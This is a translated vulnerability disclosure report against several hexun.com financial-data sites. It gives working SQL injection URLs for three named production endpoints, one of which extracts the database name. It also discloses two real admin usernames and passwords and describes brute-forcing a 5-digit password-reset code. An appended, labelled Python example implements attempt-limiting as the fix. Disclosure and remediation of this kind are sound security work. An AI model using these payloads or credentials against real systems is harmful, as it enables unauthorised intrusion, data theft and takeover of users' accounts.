Multiple SQL injection vulnerabilities + weak passwords + arbitrary password reset

WeiDun Firewall (威盾防火墙) 2015-01-08

First instance

http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15

The start_date parameter is injectable.

http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'1'='1 // returns correctly
http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'2'='1 // returns an error
http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20SUBSTRING(DB_NAME(),1,1)='d'%20and%20'1'='1 // returns correctly
http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20SUBSTRING(DB_NAME(),1,7)='db_info'%20and%20'1'='1 // the database is db_info

Second instance

http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053&accountdate=2004-12-31

The stockid and accountdate parameters are injectable.

http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%2and 1=1 and%20'1'='1&accountdate=2004-12-31 // returns correctly
http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%20and 1=2 %20'2'='1&accountdate=2004-12-31 // returns an error
http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%20and%20%201=1%20and%20'1'='1&accountdate=2004-12-31 // returns correctly
http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%20and%20%201=2%20and%20'1'='1&accountdate=2004-12-31 // returns an error

Third instance

http://data.stock.hexun.com/hxclub/Ranking/zyywsr.aspx?date=2011-06-30&tag=desc&sort=2

The date parameter

http://data.stock.hexun.com/hxclub/Ranking/zyywsr.aspx?date=2011-06-30'%20and%201=1%20and%20'1'='1&tag=desc&sort=2 // returns correctly
http://data.stock.hexun.com/hxclub/Ranking/zyywsr.aspx?date=2011-06-30'%20and%201=2%20and%20'1'='1&tag=desc&sort=2 // returns an error

0x02 Two weak passwords


http://testwap.hexun.com/admin/index.jsp
Username: admin, password: 111111
http://315.stock.hexun.com/login.action#
Username: hrstock
Password: hrstock2012

0x03 Arbitrary user password reset

https://reg.hexun.com/getpassword.aspx

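When a password is recovered, a 5-digit verification code is sent to the user's phone. There is no limit on the number of attempts, so the code can be fuzzed.

Once the verification code is obtained, any user's password can be reset.

Remediation suggestions:

1. Filter and validate input

2. Change the usernames and passwords

3. Limit the number of verification attempts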
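
The following is an added example, not part of the original report or the affected site's code, showing one way to implement suggestion 3 for the 5-digit reset code described in 0x03. The class name, method names and all limit values are assumptions chosen for illustration.

```python
import hmac
import secrets
import time

MAX_FAILURES = 5      # assumed policy: wrong guesses allowed per issued code
CODE_TTL = 300        # assumed policy: code lifetime in seconds
MAX_ISSUES = 3        # assumed policy: codes issued per account per window
ISSUE_WINDOW = 3600   # assumed policy: issuance window in seconds


class ResetCodeStore:
    """Hypothetical in-memory store: one pending reset code per account."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}   # account -> [code, expires_at, failures]
        self._issued = {}    # account -> timestamps of recent issues

    def issue(self, account):
        now = self._clock()
        recent = [t for t in self._issued.get(account, []) if now - t < ISSUE_WINDOW]
        if len(recent) >= MAX_ISSUES:
            self._issued[account] = recent
            return None      # throttled: re-requesting must not reset the guess budget
        self._issued[account] = recent + [now]
        # 5 digits as on the page: only 100,000 values, so the caps do the work.
        code = f"{secrets.randbelow(100_000):05d}"
        self._pending[account] = [code, now + CODE_TTL, 0]
        return code          # delivered by SMS only, never echoed to the client

    def verify(self, account, guess):
        entry = self._pending.get(account)
        if entry is None:
            return "no_code"
        code, expires_at, _ = entry
        if self._clock() > expires_at:
            del self._pending[account]
            return "expired"
        if hmac.compare_digest(code.encode(), str(guess).encode()):
            del self._pending[account]   # single use
            return "ok"
        entry[2] += 1
        if entry[2] >= MAX_FAILURES:
            del self._pending[account]   # burn the code after too many misses
            return "locked"
        return "wrong"
```

With these assumed limits, at most 15 guesses per hour can be made against a space of 100,000 codes. A production deployment would keep this state in a shared store rather than in process memory.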

 
